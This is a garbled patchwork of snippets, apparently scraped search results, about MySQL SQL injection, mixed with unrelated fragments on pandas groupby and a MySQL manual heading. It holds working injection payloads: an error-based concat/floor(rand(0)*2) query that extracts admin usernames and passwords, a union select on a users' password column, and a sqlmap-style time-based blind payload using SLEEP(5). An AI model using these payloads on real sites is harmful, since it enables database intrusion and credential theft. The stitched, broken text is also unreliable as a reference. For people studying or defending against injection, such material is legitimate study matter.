concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
I have decided to write a cheatsheet containing all that i have learnt from 2 years in the web application security field
HocaXD has realised a new security note SNEA India Community SQLi Vuln.
The CONCAT, rand, and min look like attempts to (partially) disguise the attack string. Perhaps from some automated detection algorithm?
-- file.php?var=1 or (select count(*) from table group by concat(version(),floor(rand(0)*2)))-- file.php?var=1 union select password from users where id=1 and row(1,1)
FLOOR(RAND(0)*2)) HAVING MIN(0)#&posted_by= # # Type: AND/OR time-based blind # Title: MySQL >= 5.0.12 time-based blind - Parameter replace # Payload: property_type=&city=(CASE WHEN (9487=9487) THEN SLEEP(5) ELSE 9487 END)&posted_by= # # Parameter: posted_by (GET)...
Note: The GROUP_CONCAT() function allows grouping of the tables/columns, instead. of viewing them one at a time.
pandas 将min()与groupby一起使用时, 并保留其他列数据, 类似于sql中的group by having min().
11.15.3. GROUP BY and HAVING with Hidden Columns.